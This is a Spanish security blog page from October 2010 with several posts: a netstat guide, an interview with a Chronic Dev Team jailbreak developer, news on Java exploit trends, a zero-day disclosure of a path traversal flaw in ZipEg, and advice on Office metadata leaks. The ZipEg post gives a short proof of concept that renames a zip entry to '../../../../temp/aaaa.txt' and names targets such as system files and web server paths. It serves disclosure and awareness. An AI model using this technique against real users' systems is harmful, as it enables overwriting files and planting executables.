Como se ve en la figura 1, con netstat -h se accede a la lista de parámetros que soporta netstat. Si se desea más ayuda o información acerca de este comando es posible consultar el manual completo del comando ejecutando un man netstat.

Son muchos los parámetros que se pueden aplicar a este comando tal y como se puede observar en la ayuda. Dependiendo las necesidades que el usuario necesite se pueden aplicar unos u otros. A continuación se detalla la función de algunos de ellos.

Estado de las conexiones

(-a) Permite visualizar el estado de la conexión para saber si está activa, cerrada o en espera. Como se puede ver en la Figura 2, este equipo tiene 5 conexiones abiertas para 5 servicios de red distintos.

Figura 2: netstat -a muestra el estado de las conexiones

Números de puerto y direcciones IP conectadas

(-n) Muestra números de puertos y direcciones IP de los equipos conectados en formato numérico. Los puertos, aunque pueden ser cambiados por las aplicaciones, suelen representar a un servicio concreto. Es suficiente con buscar la información del puerto well-known asociado a un servicio para entender lo que está pasando.

Figura 3: Este equipo está escuchando peticiones por el puerto 88 en todos los protocolos

Tráfico de una conexión

(-i) Devuelve información relativa a bytes subidos y bajados, direcciones de conexión, tamaños de trama MTU, etcétera, relativos a una de la interfaz de red indicada. De esta manera se puede conocer que servicio es el que se está "comiendo" el ancho de banda en un determinado momento.

Figura 4: Netstat -i muestra conexiones activas

Refinamiento de datos por protocolos

(-p) Permite filtrar conexiones por un determinado protocolo. Esto es útil cuando el número de conexiones es muy alto o cuando se quiere realizar algún script automatizado que reporte el consumo de red de algunas aplicaciones cada cierto tiempo.

Figura 5: Filtrado de protocolos con netstat -p tcp

Netstat es un comando básico en un proceso de análisis forense y muy necesario a la hora de administrar correctamente las conexiones que está realizando un sistema operativo y así poder detectar si existen conexiones innecesarias, problemas de la configuración en el firewall o servicios malintencionados, como puede ser un malware.

A la hora de administrar de forma segura un equipo es necesario que éste sólo ofrezca los servicios estrictamente necesarios, ya que es posible que uno de los que no se necesiten pueda tener vulnerabilidades y comprometer todo el sistema. Si conoces lo que ejecuta tu sistemas tal vez puedas reducir la superficie de exposición del mismo.

miércoles, 20 de octubre de 2010

Entrevista con p0sixninja del Chronic Dev Team

En las últimas semanas hemos venido hablando desde Seguridad Apple del esperado Greenpois0n, la herramienta definitiva para realizar un jailbreak a los dispositivos Apple que ha sido creada por el Chronic Dev Team.

En iPhoneWorld han publicado una entrevista que le han realizado a un miembro del equipo de Greenpois0n, Joshua Hill, un joven hacker de Atlanta de 25 años. Esta es una traducción de la entrevista original que se ha publicado.

Cuéntenos algo de usted, su formación, sus aficiones y por qué llegó al mundo del hacking sobre iPhone.

Mi formación no es de gran altura, abandoné la Universidad, estuve trabajando en varios trabajos por salario mínimo, la verdad que no es muy emocionante esa parte de mi vida. Me obsesioné con la seguridad informática y el mundo del hacking desde muy joven. La primera vez que leí acerca de iPhone me enamoré, fue el dispositivo que estuve esperando toda mi vida. Nunca imaginé que llegaría a dónde hemos llegado.

¿Puede contarnos alguna anécdota sobre el equipo de desarrollo?¿Cómo se formó, cuales son sus metas?

La verdad es que yo no me encontraba allí cuando el grupo se formó, así que no sabría decirte el porqué o quienes lo fundaron. Yo empecé a trabajar con chronic, pod2g y cpich realizando ingeniería inversa en el butrón de iPod Touch 2G poco después de que se descubriera la vulnerabilidad arm7_go. Más o menos un mes después descubrimos 24kpwn y fue entonces cuando el grupo empezó a despegar. Después de eso trabajamos con geohot un tiempo para crear genpass, una herramienta que permite a la gente generar claves vfdecrypt para descifrar sistemas de ficheros iPhone.

Cuando iPhone 3Gs fue lanzado descubrimos una vulnerabilidad de heap overflow pero, desafortunadamente, geohot nos ganó liberándola con purplera1n. Entonces cuando iPod Touch 3g salió descubrimos la vulnerabilidad de null pointer deferer 21,2 en el USB, pero de nuevo geohot se nos adelantó con blackra1n. Estábamos realmente esperanzados de que SHAtter sería nuestra gran ruptura, pero creo que tendremos que seguir intentándolo. Al final, sólo estamos tratando de divertirnos, y al menos eso lo conseguimos.

Greenposi0n es una maravillosa herramienta de iOS 4.1 que todo el mundo esperó durante tiempo para tener en sus manos. Sin embargo en el último momento su fecha de lanzamiento fue cambiado debido a geohot de lanzar su propio jailbreak, ¿Por qué cree que lanzó su jailbreak en ese momento y cuáles son tus sentimientos?

Ningún comentario... :P

Entonces, ¿Por qué decidió retrasar el lanzamiento de su harramienta por este motivo?

Realmente no tuvimos otra opción, teníamos que mantener el interés de la comunidad sin tener en cuenta nuestros sentimientos.

Cambiando de tema, ¿tiene algo que ver el exploit usado por geohot con el mensaje 21,2 del USB?

Sí, pero es usado de forma distinta a como se usó en iBoot.

¿Se podría decir que no todo lo que esperabais implementar en la primera versión de Grenpois0n está allí por causa de lo que sucedió?

Tenemos casi toda la funcionalidad, por supuesto hay toneladas de otras funcionalidades que me gustaría añadir, pero podrán ser añadidas posteriormente.

Entonces ¿qué podremos esperar de la versión final de Greenpois0n?

No tengo claro a qué te refieres con versión final del proyecto. Greenpois0n es un proyecto vivo que será ampliado y mejorado durante todo el tiempo que yo sea parte de la scene. Una vez que yo me vaya será recogido por algún otro y continuado.

¿Así que estás planeando continuar manteniendo el proyecto más allá de la versión 4.1?

Por supuesto.

La muy anticipada versión de GreenPois0n para MAC es la única que no estuvo disponible para descarga en el momento del lanzamiento. ¿Cuál fue el motivo detrás de este retraso?

Sí, fue una gran decepción para mí también. Todo estaba listo para lanzar la versión de Mac con el exploit SHAtter. Desafortunadamente el exploit de geohot tenía algunos problemas corriendo con OSX. Sin embargo, encontró algunas soluciones y hoy en día ya está disponible la versión para MAC.

¿Qué sistema operativo cree que tendrá la versión más estable/soportada de Greenpois0n? ¿Linux, Mac o Windows?

Sin duda Linux. Casi todo mi desarrollo lo realizo en Linux. Mac está justo después ya que tengo que usar algunos componentes de este sistema operativo. Respecto a Windows, honestamente, no he utilizado GreenPois0n en él, dejo que sea  pod2g quien se encargue de estos asuntos.

¿Tienes pensado liberar el códigto de Greenpois0n para la comunidad?

Ya hay algo de código liberado, aunque un poco de ese código ha quedado obsoleto, pero seguiré actualizándolo para la comunidad.

Todo el mundo está esperando un unlock para el IOS 4.1 de iPhone ¿Cuánto de pronto crees que saldrá?

No estoy completamente seguro. Nunca hemos hecho ningún trabajo en la banda base o trabajado en ningún unlock previamente y el Dev Team mantiene esto en secreto incluso para nosotros.

Chronic Dev Team ha hecho un trabajo increible liberando Greenpois0n y dando soporte a la herramienta por un canal del IRC. ¿Qué puede hacer un usuario habitual de Greenpois0n para ayudaros a vosotros?

Cualquier reporte de bugs o sugerencia de característica sería muy amble, y por supuesto, las donaciones siempre son bien valoradas.

¿Últimas palabras para nuestros lectores?

Gracias por todo el apoyo, ¡esta comunidad es fantástica!

martes, 19 de octubre de 2010

Malware aprovecha Java para entrar en todos los sistemas

Durante el año 2009 el objetivo de los creadores de malware fue Adobe. Tanto el formato PDF como el formato Flash estuvo en el ojo del huracán, descubriéndose vulnerabilidad tras vulnerabilidad y publicándose exploit tras exploit. Esta cadena de reacciones llevó a que Apple se negase en rotundo a admitir Flash en iPhone o que en la Virus Bulletin de este año se abogara por sustituir el formato PDF, mientras que la compañía prepara el lanzamiento de Adobe Acrobat  y Acrobat Reader X con una sandbox incorporada para mitigar el impacto de las vulnerabilidades.

Sin embargo, un informe realizado desde el Microsoft Malware Protection Center demuestra que mientras que todo el mundo sitúa a Adobe en lo alto de la lista de objetivos de los creadores de malware, durante el año 2010 estos han migrado hacia la plataforma Java, habiéndose producido una oleado sin parangón de ataques dirigidos a entornos Java sin actualizar.


La gráfica superior, que compara los intentos de ataque a exploits Java y PDF, deja los exploits PDF a la altura del betún, comparándolos con los exploits Java. Lo curioso de todos estos ataques es que se basan en 3 vulnerabilidades Java multiplataforma conocidas: CVE-2008-5353CVE-2009-3867CVE-2010-0094.

Todas estas vulnerabilidades afectan a sistemas Windows, Mac OS X y Linux, con lo que si la máquina virtual de Java no está actualizada a la última versión, el sistema estará en riesgo, y además contra unos activos creadores de malware. Además, como añade el investigador del trabajo, aprovechar vulnerabilidades en Java ayuda a poder distribuir malware en muchas plataformas, así que era cuestión de tiempo que se quisieran aprovechar de ellas.

Según la propia teoría del propio investigador, Java ha estado fuera de la lista de posibles objetivos para las herramientas de protección. Además, sistemas antimalware y analizadores de ficheros en IDS o sistemas preventivos de análisis heurísticos o en tiempo real, deberán lidiar con el parseo y ejecuciones controladas de código en Java, algo que tradicionalmente no ha sido lo que más ha gustado a esta industria, debido a lo lento del parseo y la ejecución con códigos Java. 

Tal vez, para conseguir analizar todos los ficheros en tiempos óptimos de ejecución, los motores antimalware deban tener una parte del trabajo en el equipo y otra parte de trabajo en servicios en la nube. Si el volumen de malware continúa creciendo, la detección de un programa malicioso será cada vez más costosa en tiempo de computación.

lunes, 18 de octubre de 2010

0-day de Path tranversal en ZipEg para Mac OS y Windows

ZipEg es una herramienta de compresión/descompresión de ficheros con interfaz gráfica para sistemas Mac OS X muy popular. En artículos anteriores ya habíamos hablado sobre fallos de seguridad en los permisos de ficheros en el proceso de instalación, permitiendo remplazar ficheros originales por copias modificadas.

El artículo de hoy se centra en un fallo de seguridad de no solucionado localizado en esta misma aplicación, la cual no realiza una adecuada comprobación de los nombres de los ficheros a la hora de descomprimir los ficheros al escribirlos en disco, provocando un ataque de Path Transversal. Este tipo de ataques ya han afectado con anterioridad a otras herramientas de compresión.

Prueba de Concepto

En la siguiente captura se ve el contenido de un fichero comprimido con extensión ‘.zip’ que contiene en su interior otro fichero llamado ‘aaaaaaaaaaaaaaaaa.txt’. En la imagen siguiente se puede ver como el nombre del archivo se puede leer en ASCII dentro del fichero.

Figura 1: El nombre del fichero se puede leer en el contenido del fichero zip

Esta sería la estructura normal de un fichero .zip y, debido al comportamiento normal del sistema de descompresión ZipEg, la extracción del fichero se realizará en el mismo directorio en donde se encuentre el fichero .zip que, en este ejemplo concreto, es /Users/i64/Desktop/aaaaaaaaaaaaaaa.txt. En la imagen siguiente se puede ver como ZipEg avisa de este comportamiento.

Figura 2: Extracción normal de un fichero comprimido

El fallo, sin embargo, radica en que ZipEg no realiza una verificación del nombre del fichero, pudiéndose, de este modo, realizar un ataque de Path Transversal con el que se conseguiría que la descompresión del fichero se realizase en la ruta indicada por el atacante. Esto sucederá así, siempre y cuando el usuario que realice la extracción tenga los permisos necesarios.

Para conseguir este objetivo es suficiente con modificar, mediante un editor hexadecimal, el nombre de archivo ‘aaaaaaaaaaaaaaaaa.txt’ por una ruta del sistema. En este ejemplo concreto se ha seleccionado ‘../../../../temp/aaaa.txt’ para lograr este efecto.

Figura 3: Modificación del nombre del fichero con una ruta de extracción

Ahora, cuando el usuario trate de realizar una descompresión de este fichero, la ruta de destino será /tmp/aaaa.txt en lugar de la ruta esperada.

Figura 4: El archivo se descomprime en la ruta inyectada

Vectores de ataque

Este tipo de fallos de seguridad pueden ser especialmente peligrosos en múltiples entornos. Hay que tener en cuenta que si el fichero contiene muchos archivos comprimidos, para el atacante es bastante sencillo ocultar uno con este comportamiento.

Si además, el usuario tiene muchos privilegios en la máquina, se podrían sobrescribir archivos de configuración importantes del sistema o, incluso, crear archivos ejecutables en rutas de un servidor web.  Este tipo de vulnerabilidades son muy comunes en ataques dirigidos, es decir, cuando el ataque no se ha creado para cualquier usuarios, sino para una persona en concreto. 

Sistemas afectados

Actualmente, la versión 2.9 de ZipEg, tanto para Windows como para Mac OS X son vulnerables a este tipo de ataques.

Autor: Manu "The Sur"

domingo, 17 de octubre de 2010

Metadatos en Microsoft Office para MAC OS X

Tony Blair en el año 2003 dijo que nadie de su equipo había manipulado un documento enviado desde Estados Unidos que demostraba que en Irak había armas de destrucción masiva. Sin embargo, cuando se hizo público en Internet ese documento, en formado doc de Microsoft Office, los metadatos demostraron que 4 miembros de su gabinete lo habían manipulado.

Hace poco la CENATIC, organismo de referencia del uso de las tecnologías de fuentes abiertas, fue pillado con un documento en PDF que había sido creado utilizando Apple Keynote sobre Mac OS X, que nada tienen que ver con herramientas de fuentes abiertas.

No sólo los documentos de Microsoft Office tienen metadatos. Documentos en formatos multimedía, PDF u OpenOffice adolecen, o incorporan esta característica, según se mire. Los metadatos pueden ser utilizados para cosas útiles y funcionales, como demuestra Automator, una herramienta que permite manipular ficheros en sistemas MAC OS X en función de sus metadatos.

El último gran escándalo se ha producido en el ayuntamiento de Leganés, en el que se ha descubierto, por medio de los metadatos, que el creador de un pliego de condiciones del ayuntamiento había sido la empresa a la que se adjudicó el concurso.

Los metadatos en los documentos ofimático pueden significar un gran problema para la seguridad de una empresa, tanto que el recientemente aprobado Esquema Nacional de Seguridad alerta de ello y recomienda medidas de protección contra la fuga de información en Metadatos.

Las herramientas de Microsoft Office, desde sus versiones para Mac 2008 y la próxima Office 2011, disponen de una herramienta de limpieza de metadatos incluida. Basta con ir a las opciones del menú y seleccionar Preparar/Inspeccionar Documento, para saber que metadatos incorpora y eliminarlos. Para las versiones anteriores Microsoft no oferta ninguna herramienta de limpieza de metadatos.

Metadatos en un fichero doc creado con MS Office 2008 para Mac publicado en Apple.com

Sin embargo, en formatos binarios, es decir, los formatos previos de Microsoft Office antes de pasar a OOXML, a saber: xls, ppt, doc, etc... aunque se eliminen los metadatos, siempre es posible conocer qué versión del sistema operativo y del paquete ofimático se utilizó, ya que en los Streams OLE queda marcada esta información. Así, es posible descargar ficheros de Internet, del mismo sitio de Apple, y descubrir un montón de información sensible con herramientas como la FOCA.

Tabla de valores en Streams OLE

El verdadero problema no radica en los datos que se pueden descubrir en un único fichero, sino que en un entorno público de Internet, donde en un sito web se publican miles de archivos, si todos estos no están limpios de metadatos, la información obtenida con ellos puede ser peligrosa para la organización. 

Sé higiénico, limpia los metadatos de tus documentos antes de enviarlos por correo o publicarlos en Internet.
Artículos relacionados

Otras historias relacionadas

Entradas populares